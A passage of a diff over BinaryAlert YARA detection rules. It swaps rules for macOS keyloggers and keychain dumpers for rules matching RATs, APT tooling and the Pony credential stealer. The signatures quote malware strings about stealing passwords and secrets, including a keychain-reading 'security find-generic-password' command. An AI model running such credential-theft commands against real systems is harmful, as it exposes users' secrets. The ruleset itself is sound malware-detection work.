-		$a2 = "ERROR: Unable to create event tap." wide ascii
-		$a3 = "Keystrokes are now being recorded" wide ascii
+		$a1 = "icloud_phish_stop" fullword wide ascii
+		$a2 = "icloud_contacts" fullword wide ascii
+		$a3 = "itunes_backups" fullword wide ascii
+		$a4 = "chrome_passwords" fullword wide ascii
+		$a5 = "Starting EvilOSX..." wide ascii
 
 	condition:
-		2 of ( $a* )
+		4 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Juuso_Keychaindump
+rule BINARYALERT_Malware_Multi_Vesche_Basicrat
 {
 	meta:
-		description = "For reading OS X keychain passwords as root."
+		description = "cross-platform Python 2.x Remote Access Trojan (RAT)"
 		author = "@mimeframe"
-		id = "10ee6c24-db35-5178-9a40-92f5231948aa"
+		id = "e07a684c-3a3d-5dd3-a540-2cc9a5a170dd"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/juuso/keychaindump"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_juuso_keychaindump.yara#L1-L16"
+		reference = "https://github.com/vesche/basicRAT"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_vesche_basicrat.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "dd2fb6249fe4b7381e734ea3a308158159f7e79b39ba5c970241dcd66436d669"
+		logic_hash = "1503ce9de4e721903058c77b305ba057052d654ff1875ea880f4319c3e525a29"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "[-] Too many candidate keys to fit in memory" wide ascii
-		$a2 = "[-] Could not allocate memory for key search" wide ascii
-		$a3 = "[-] Too many credentials to fit in memory" wide ascii
-		$a4 = "[-] The target file is not a keychain file" wide ascii
-		$a5 = "[-] Could not find the securityd process" wide ascii
-		$a6 = "[-] No root privileges, please run with sudo" wide ascii
+		$a1 = "HKCU Run registry key applied" wide ascii
+		$a2 = "HKCU Run registry key failed" wide ascii
+		$a3 = "Error, platform unsupported." wide ascii
+		$a4 = "Persistence successful," wide ascii
+		$a5 = "Persistence unsuccessful," wide ascii
 
 	condition:
-		4 of ( $a* )
+		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Eldeveloper_Keystats
+rule BINARYALERT_Malware_Multi_Pupy_Rat
 {
 	meta:
-		description = "A simple keylogger for macOS."
+		description = "pupy - opensource cross platform rat and post-exploitation tool"
 		author = "@mimeframe"
-		id = "7fddb502-ae2d-5e14-95f5-115498fa5926"
+		id = "b26deb19-85b2-5d39-9ff2-0ab9017f3263"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/ElDeveloper/keystats"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_eldeveloper_keystats.yara#L1-L13"
+		reference = "https://github.com/n1nj4sec/pupy"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/multi/malware_multi_pupy_rat.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "c73f5ca2ba0a1bde7c1f9b96173938e40511e12f875c4d850d6d498c63e89385"
+		logic_hash = "bb5d1e7f2aea94dc41efe75690ae31409e8f6305aa6c4ec0cd46922ee8fb7241"
 		score = 75
-		quality = 80
+		quality = 74
 		tags = ""
 
 	strings:
-		$a1 = "YVBKeyLoggerPerishedNotification" wide ascii
-		$a2 = "YVBKeyLoggerPerishedByLackOfResponseNotification" wide ascii
-		$a3 = "YVBKeyLoggerPerishedByUserChangeNotification" wide ascii
+		$a1 = "dumping lsa secrets" nocase wide ascii
+		$a2 = "dumping cached domain passwords" nocase wide ascii
+		$a3 = "the keylogger is already started" nocase wide ascii
+		$a4 = "pupyutils.dns" wide ascii
+		$a5 = "pupwinutils.security" wide ascii
+		$a6 = "-PUPY_CONFIG_COMES_HERE-" wide ascii
 
 	condition:
-		2 of ( $a* )
+		3 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Manwhoami_Mmetokendecrypt
+rule BINARYALERT_Malware_Windows_Moonlightmaze_IRIX_Exploit_GEN : FILE
 {
 	meta:
-		description = "This program decrypts / extracts all authorization tokens on macOS / OS X / OSX."
-		author = "@mimeframe"
-		id = "2dc01ff3-4c4a-548d-b2f0-b36897ad6a5c"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/manwhoami/MMeTokenDecrypt"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_mmetokendecrypt.yara#L1-L15"
+		description = "Rule to detect Irix exploits from David Hedley used by Moonlight Maze hackers"
+		author = "Kaspersky Lab"
+		id = "4f9ab7b0-4fb9-5311-ae23-01d0a9e2e104"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://www.exploit-db.com/exploits/19274/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_IRIX_exploit_GEN.yara#L3-L20"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "ccfedfbff0c6eefe41e80fe488d4cae928a33e7b86019c6ec54d1c9005b35147"
+		logic_hash = "9d55d780c84f2aa4e64c19842b2055ef4bf7c8844ebe622c3942445b06ab8344"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		md5_1 = "008ea82f31f585622353bd47fa1d84be"
+		md5_2 = "a26bad2b79075f454c83203fa00ed50c"
+		md5_3 = "f67fc6e90f05ba13f207c7fdaa8c2cab"
+		md5_4 = "5937db3896cdd8b0beb3df44e509e136"
+		md5_5 = "f4ed5170dcea7e5ba62537d84392b280"
 
 	strings:
-		$a1 = "security find-generic-password -ws 'iCloud'" wide ascii
-		$a2 = "ERROR getting iCloud Decryption Key" wide ascii
-		$a3 = "Could not find MMeTokenFile. You can specify the file manually." wide ascii
-		$a4 = "Decrypting token plist ->" wide ascii
-		$a5 = "Successfully decrypted token plist!" wide ascii
+		$a1 = "stack = 0x%x, targ_addr = 0x%x"
+		$a2 = "execl failed"
 
 	condition:
-		3 of ( $a* )
+		( uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule BINARYALERT_Hacktool_Macos_N0Fate_Chainbreaker
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Custom_Sniffer
 {
 	meta:
-		description = "chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner."
-		author = "@mimeframe"
-		id = "565d31c6-8d80-534d-8acc-c01d7af4f8b3"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/n0fate/chainbreaker"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_n0fate_chainbreaker.yara#L1-L13"
+		description = "Rule to detect Moonlight Maze sniffer tools"
+		author = "Kaspersky Lab"
+		id = "a9f005e0-8d73-58ff-b010-d3ce08ffdb64"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_custom_sniffer.yara#L1-L20"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "7aedf952756ed2375ff171329179f14a8cdc37ada69e1f003def1f1de5bc1691"
+		logic_hash = "466be027f567fe0afc88c82d94e4e0171b4b7d8f38d27a4c4a18cec4ca2b8b2f"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "7b86f40e861705d59f5206c482e1f2a5"
+		md5_2 = "927426b558888ad680829bd34b0ad0e7"
 
 	strings:
-		$a1 = "[!] Private Key Table is not available" wide ascii
-		$a2 = "[!] Public Key Table is not available" wide ascii
-		$a3 = "[-] Decrypted Private Key" wide ascii
+		$a1 = "/var/tmp/gogo" fullword
+		$a2 = "myfilename= |%s|" fullword
+		$a3 = "mypid,mygid=" fullword
+		$a4 = "mypid=|%d| mygid=|%d|" fullword
+		$a5 = "/var/tmp/task" fullword
+		$a6 = "mydevname= |%s|" fullword
 
 	condition:
-		all of ( $a* )
+		any of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Manwhoami_Icloudcontacts
+rule BINARYALERT_Malware_Windows_Xrat_Quasarrat
 {
 	meta:
-		description = "Pulls iCloud Contacts for an account. No dependencies. No user notification."
+		description = "xRAT is a derivative of QuasarRAT; this catches both RATs."
 		author = "@mimeframe"
-		id = "b6595540-7f89-5764-b34e-d32c1a377b6c"
+		id = "f4db2402-3653-5525-a137-de2de29cef28"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/manwhoami/iCloudContacts"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_icloudcontacts.yara#L1-L14"
+		reference = "https://github.com/quasar/QuasarRAT"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_xrat_quasarrat.yara#L1-L31"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "0c5b81454b26de91f5ad126b24f10397e1da5d8561b0bf22c5df128753df0ac2"
+		logic_hash = "92533157a62ccae5d1bdc9d0bb7511817422c6b5d75d013a15173cd1121d099e"
 		score = 75
-		quality = 80
+		quality = 30
 		tags = ""
 
 	strings:
-		$a1 = "https://setup.icloud.com/setup/authenticate/" wide ascii
-		$a2 = "https://p04-contacts.icloud.com/" wide ascii
-		$a3 = "HTTP Error 401: Unauthorized. Are you sure the credentials are correct?" wide ascii
-		$a4 = "HTTP Error 404: URL not found. Did you enter a username?" wide ascii
+		$a1 = ">> New Session created" wide ascii
+		$a2 = ">> Session unexpectedly closed" wide ascii
+		$a3 = ">> Session closed" wide ascii
+		$a4 = "session unexpectedly closed" wide ascii
+		$a5 = "cmd" fullword wide ascii
+		$a6 = "/K" fullword wide ascii
+		$b1 = "echo DONT CLOSE THIS WINDOW!" wide ascii
+		$b2 = "ping -n 20 localhost > nul" wide ascii
+		$b3 = "Downloading file..." wide ascii
+		$b4 = "Visited Website" wide ascii
+		$b5 = "Adding Autostart Item failed!" wide ascii
+		$b6 = ":Zone.Identifier" wide ascii
+		$c1 = "GetDrives I/O error" wide ascii
+		$c2 = "/r /t 0" wide ascii
+		$c3 = "desktop.ini" wide ascii
+		$c4 = "WAN IP Address" wide ascii
+		$c5 = "User refused the elevation request." wide ascii
+		$c6 = "Process already elevated." wide ascii
 
 	condition:
-		3 of ( $a* )
+		5 of ( $a* ) or 5 of ( $b* ) or 5 of ( $c* )
 }
-rule BINARYALERT_Hacktool_Macos_Ptoomey3_Keychain_Dumper
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki
 {
 	meta:
-		description = "Keychain dumping utility."
-		author = "@mimeframe"
-		id = "c45abbbe-f5fe-5a87-acd4-dcdb99ceec28"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/ptoomey3/Keychain-Dumper"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_ptoomey3_keychain_dumper.yara#L1-L15"
+		description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings"
+		author = "Kaspersky Lab"
+		id = "06eeb6a4-540f-51eb-86f9-4ab49543f645"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki.yara#L1-L27"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f2ef979e4682ce617b37f7503ec2ca520e657b4f6d15a75afad59b62191a1a43"
+		logic_hash = "9a403695ded6ff3626820ba0d4abde7ccd6f3fa6bfd8aa4ceaf0cc009d34c97f"
 		score = 75
 		quality = 80
 		tags = ""
+		md5_1 = "14cce7e641d308c3a177a8abb5457019"
+		md5_2 = "a3164d2bbc45fb1eef5fde7eb8b245ea"
+		md5_3 = "dabee9a7ea0ddaf900ef1e3e166ffe8a"
+		md5_4 = "1980958afffb6a9d5a6c73fc1e2795c2"
+		md5_5 = "e59f92aadb6505f29a9f368ab803082e"
 
 	strings:
-		$a1 = "keychain_dumper" wide ascii
-		$a2 = "/var/Keychains/keychain-2.db" wide ascii
-		$a3 = "<key>keychain-access-groups</key>" wide ascii
-		$a4 = "SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet" wide ascii
-		$a5 = "dumpEntitlements" wide ascii
+		$a1 = "Write file Ok..." ascii wide
+		$a2 = "ERROR: Can not open socket...." ascii wide
+		$a3 = "Error in parametrs:" ascii wide
+		$a4 = "Usage: @<get/put> <IP> <PORT> <file>" ascii wide
+		$a5 = "ERROR: Not connect..." ascii wide
+		$a6 = "Connect successful...." ascii wide
+		$a7 = "clnt <%d> rqstd n ll kll" ascii wide
+		$a8 = "clnt <%d> rqstd swap" ascii wide
+		$a9 = "cld nt sgnl prcs grp" ascii wide
+		$a10 = "cld nt sgnl prnt" ascii wide
+		$a11 = "ork error" ascii fullword
 
 	condition:
-		all of ( $a* )
+		2 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Macpmem
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Cle_Tool
 {
 	meta:
-		description = "MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers."
-		author = "@mimeframe"
-		id = "4890598e-936c-5a4d-9004-88ff4fe57c49"
+		description = "Rule to detect Moonlight Maze 'cle' log cleaning tool"
+		author = "Kaspersky Lab"
+		id = "d875a3cf-cad1-509f-bb9f-27f0a3a9b79d"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/google/rekall/tree/master/tools/osx/MacPmem"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_macpmem.yara#L3-L22"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_cle_tool.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "d64b5a5423932211e3b72d949028f3f0ed1f1435e9584cffa947f2bd4846c29b"
+		hash = "647d7b711f7b4434145ea30d0ef207b0"
+		logic_hash = "8f75df1240b9e5e905492106265a7e1342db4140d715529933af4ba5c8ec6331"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "%s/MacPmem.kext" wide ascii
-		$a2 = "The Pmem physical memory imager." wide ascii
-		$a3 = "The OSXPmem memory imager." wide ascii
-		$a4 = "These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs." wide ascii
-		$a5 = "Pmem driver version incompatible. Reported" wide ascii
-		$a6 = "Memory access driver left loaded since you specified the -l flag." wide ascii
-		$b1 = "Unloading MacPmem" wide ascii
-		$b2 = "MacPmem load tag is" wide ascii
+		$a1 = "./a filename template_file" ascii wide
+		$a2 = "May be %s is empty?" ascii wide
+		$a3 = "template string = |%s|" ascii wide
+		$a4 = "No blocks !!!"
+		$a5 = "No data in this block !!!!!!" ascii wide
+		$a6 = "No good line"
 
 	condition:
-		BINARYALERT_Macho_PRIVATE and 2 of ( $a* ) or all of ( $b* )
+		3 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Skreweverything_Swift
+rule BINARYALERT_Malware_Windows_Apt_Red_Leaves_Generic
 {
 	meta:
-		description = "It is a simple and easy to use keylogger for macOS written in Swift."
-		author = "@mimeframe"
-		id = "a4918bc3-d3f0-59f4-894f-fd34ee944fac"
+		description = "Red Leaves malware, related to APT10"
+		author = "David Cannings"
+		id = "e0067b05-eb4a-52ec-8f35-9336a631f03b"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/SkrewEverything/Swift-Keylogger"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_skreweverything_swift.yara#L1-L15"
+		reference = "https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Red%20Leaves/Source/Red%20Leaves%20technical%20note%20v1.0.md"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_red_leaves_generic.yara#L1-L27"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f400b8ec392417e7443e82a2c2a9adfc868b9795aa1fb29f91d228f6f94efd13"
+		hash = "81df89d6fa0b26cadd4e50ef5350f341"
+		logic_hash = "be03bba9d01e6584b5849514656fd7de866c478f343c0bc618d7dbeda1771696"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Can't create directories!" wide ascii
-		$a2 = "Can't create manager" wide ascii
-		$a3 = "Can't open HID!" wide ascii
-		$a4 = "PRINTSCREEN" wide ascii
-		$a5 = "LEFTARROW" wide ascii
+		$a1 = "Feb 04 2015"
+		$a2 = "I can not start %s"
+		$a3 = "dwConnectPort" fullword
+		$a4 = "dwRemoteLanPort" fullword
+		$a5 = "strRemoteLanAddress" fullword
+		$a6 = "strLocalConnectIp" fullword
+		$a7 = "\\\\.\\pipe\\NamePipe_MoreWindows" wide
+		$a8 = "RedLeavesCMDSimulatorMutex" wide
+		$a9 = "(NT %d.%d Build %d)" wide
+		$a10 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide
+		$a11 = "red_autumnal_leaves_dllmain.dll" wide ascii
+		$a12 = "__data" wide
+		$a13 = "__serial" wide
+		$a14 = "__upt" wide
+		$a15 = "__msgid" wide
 
 	condition:
-		4 of ( $a* )
+		7 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_B4Rsby_Swiftlog
+rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_1
 {
 	meta:
-		description = "Dirty user level command line keylogger hacked together in Swift."
-		author = "@mimeframe"
-		id = "b1ae8284-04a0-5818-9997-0e31eb51ed2b"
+		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
+		author = "@fusionrace"
+		id = "6b5709fd-a923-56b6-98ab-ae036f9d04c3"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/b4rsby/SwiftLog"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_b4rsby_swiftlog.yara#L1-L11"
+		reference = "https://securelist.com/introducing-whitebear/81638/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_1.yara#L1-L22"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "c66dcab2da0e543198f97ca104c13533c8950d10b6f7cbd3f906348d0f8c45ff"
+		hash = "b099b82acb860d9a9a571515024b35f0"
+		logic_hash = "f6706c66a378b80d3cedf118a812d8add60e12b44402a30d941d08ff30c7ab1c"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "You need to enable the keylogger in the System Prefrences" wide ascii
+		$a1 = "### PE STORAGE ###" wide ascii
+		$a2 = "### CRYPTO 0 ###" wide ascii
+		$a3 = "### EXTERNAL STORAGE ###" wide ascii
+		$a4 = "### CRYPTO 1 ###" wide ascii
+		$a5 = "### QUEUES ###" wide ascii
+		$a6 = "### TRANSPORT ###" wide ascii
+		$a7 = "### EXECUTION SUBSYSTEM ###" wide ascii
+		$a8 = "### AUTORUN MANAGER ###" wide ascii
+		$a9 = "### INJECT MANAGER ###" wide ascii
+		$a10 = "### LOCAL TRANSPORT MANAGER ###" wide ascii
 
 	condition:
-		all of ( $a* )
+		6 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Dannvix
+rule BINARYALERT_Malware_Windows_Pony_Stealer
 {
 	meta:
-		description = "A simple keylogger for macOS."
+		description = "Pony stealer malware"
 		author = "@mimeframe"
-		id = "598d6dbc-540d-5f96-8bd1-c15e6194012e"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/dannvix/keylogger-osx"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_dannvix.yara#L1-L13"
+		id = "77af81cb-36c7-56a7-bd89-14d79628e5c4"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://www.knowbe4.com/pony-stealer"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_pony_stealer.yara#L1-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "95d0540b1308caf3e7287c70a759954650220192800c0154d225bcb01ed55766"
+		hash = "5e52ce394c3be2a685dbb8f435e2f64f"
+		logic_hash = "4d4e28e0d4d97412a9129a4abfadc130a464a2ababf46ca8f366a2a30b262261"
 		score = 75
-		quality = 80
+		quality = 50
 		tags = ""
 
 	strings:
-		$a1 = "/var/log/keystroke.log" wide ascii
-		$a2 = "<forward-delete>" wide ascii
-		$a3 = "<unknown>" wide ascii
+		$a1 = "signons.sqlite" nocase wide ascii
+		$a2 = "signons.txt" nocase wide ascii
+		$a3 = "signons2.txt" nocase wide ascii
+		$a4 = "signons3.txt" nocase wide ascii
+		$a5 = "WininetCacheCredentials" nocase wide ascii
+		$a6 = "moz_logins" nocase wide ascii
+		$a7 = "encryptedPassword" nocase wide ascii
+		$a8 = "FlashFXP" nocase wide ascii
+		$a9 = "BulletProof" nocase wide ascii
+		$a10 = "CuteFTP" nocase wide ascii
 
 	condition:
 		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Caseyscarborough
+rule BINARYALERT_Malware_Windows_Moonlightmaze_Encrypted_Keyloger
 {
 	meta:
-		description = "A simple and easy to use keylogger for macOS."
-		author = "@mimeframe"
-		id = "82d9ff7e-b475-5888-82e1-f65c286a9cde"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/caseyscarborough/keylogger"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_caseyscarborough.yara#L1-L14"
+		description = "Rule to detect Moonlight Maze encrypted keylogger logs"
+		author = "Kaspersky Lab"
+		id = "4f290d77-5cb5-5f07-98fd-1829e2f00e63"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_encrypted_keyloger.yara#L1-L11"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "d97fbfefe027a26ec998743b811734e62423e8a5ba4e11d516dcfc9e4831d296"
+		logic_hash = "cdcbe112ae394ce0922647904f70cfae626d413d1770b0e20d2ba49e1f4e2d2d"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "/var/log/keystroke.log" wide ascii
-		$a2 = "ERROR: Unable to create event tap." wide ascii
-		$a3 = "Keylogging has begun." wide ascii
-		$a4 = "ERROR: Unable to open log file. Ensure that you have the proper permissions." wide ascii
+		$a1 = {47 01 22 2A 6D 3E 39 2C}
 
 	condition:
-		2 of ( $a* )
+		($a1 at 0 )
 }
-rule BINARYALERT_Hacktool_Multi_Bloodhound_Owned
+rule BINARYALERT_Malware_Windows_T3Ntman_Crunchrat
 {
 	meta:
-		description = "Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains"
-		author = "@fusionrace"
-		id = "4d458339-6589-5094-8c23-1ad2baee19f1"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/porterhau5/BloodHound-Owned/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_bloodhound_owned.yara#L1-L20"
+		description = "HTTPS-based Remote Administration Tool (RAT)"
+		author = "@mimeframe"
+		id = "c5b0d183-8822-505a-a1ff-7d6f75a3f174"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/t3ntman/CrunchRAT"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara#L1-L19"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "01ef15a3cd606c46dacb0f22477fe97f94e212a38af1cd5bdd7eb11efe8144dd"
+		logic_hash = "b5216b2b30d22f3d3848e1fb6e4245c558366fb8cd35b70f10fa4e605e211204"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "Find all owned Domain Admins" fullword ascii wide
-		$s2 = "Find Shortest Path from owned node to Domain Admins" fullword ascii wide
-		$s3 = "List all directly owned nodes" fullword ascii wide
-		$s4 = "Set owned and wave properties for a node" fullword ascii wide
-		$s5 = "Find spread of compromise for owned nodes in wave" fullword ascii wide
-		$s6 = "Show clusters of password reuse" fullword ascii wide
-		$s7 = "Something went wrong when creating SharesPasswordWith relationship" fullword ascii wide
-		$s8 = "reference doc of custom Cypher queries for BloodHound" fullword ascii wide
-		$s9 = "Created SharesPasswordWith relationship between" fullword ascii wide
-		$s10 = "Skipping finding spread of compromise due to" fullword ascii wide
+		$a1 = "<action>command<action>" wide ascii
+		$a2 = "<action>upload<action>" wide ascii
+		$a3 = "<action>download<action>" wide ascii
+		$a4 = "cmd.exe" wide ascii
+		$a5 = "application/x-www-form-urlencoded" wide ascii
+		$a6 = "&action=" wide ascii
+		$a7 = "&secondary=" wide ascii
+		$a8 = "<secondary>" wide ascii
+		$a9 = "<action>" wide ascii
 
 	condition:
-		any of them
+		all of ( $a* )
 }
-rule BINARYALERT_Hacktool_Multi_Ncc_ABPTTS
+rule BINARYALERT_Malware_Windows_Remcos_Rat
 {
 	meta:
-		description = "Allows for TCP tunneling over HTTP"
+		description = "No description has been set in the source file - BinaryAlert"
 		author = "@mimeframe"
-		id = "dd5f6316-9e51-5cc8-b293-dc33b09cc801"
+		id = "420c135f-3150-5cb9-9c1c-105cd260d713"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/nccgroup/ABPTTS"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/multi/hacktool_multi_ncc_ABPTTS.yara#L1-L19"
+		reference = "https://breaking-security.net/remcos/remcos-changelog/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_remcos_rat.yara#L1-L20"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "09874b1d997ac193ad1afa0226f6fb22836c8720c0599d773b18072b92a3acc4"
+		hash = "c8dafe143fe1d81ae6a3c0cd4724b272"
+		logic_hash = "ec1ec69f628111235bafad8177482256ed571c064a81f01b6ec2643dccc926ad"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "---===[[[ A Black Path Toward The Sun ]]]===---" ascii wide
-		$s2 = "https://vulnerableserver/EStatus/" ascii wide
-		$s3 = "Error: no ABPTTS forwarding URL was specified. This utility will now exit." ascii wide
-		$s4 = "tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq" fullword ascii wide
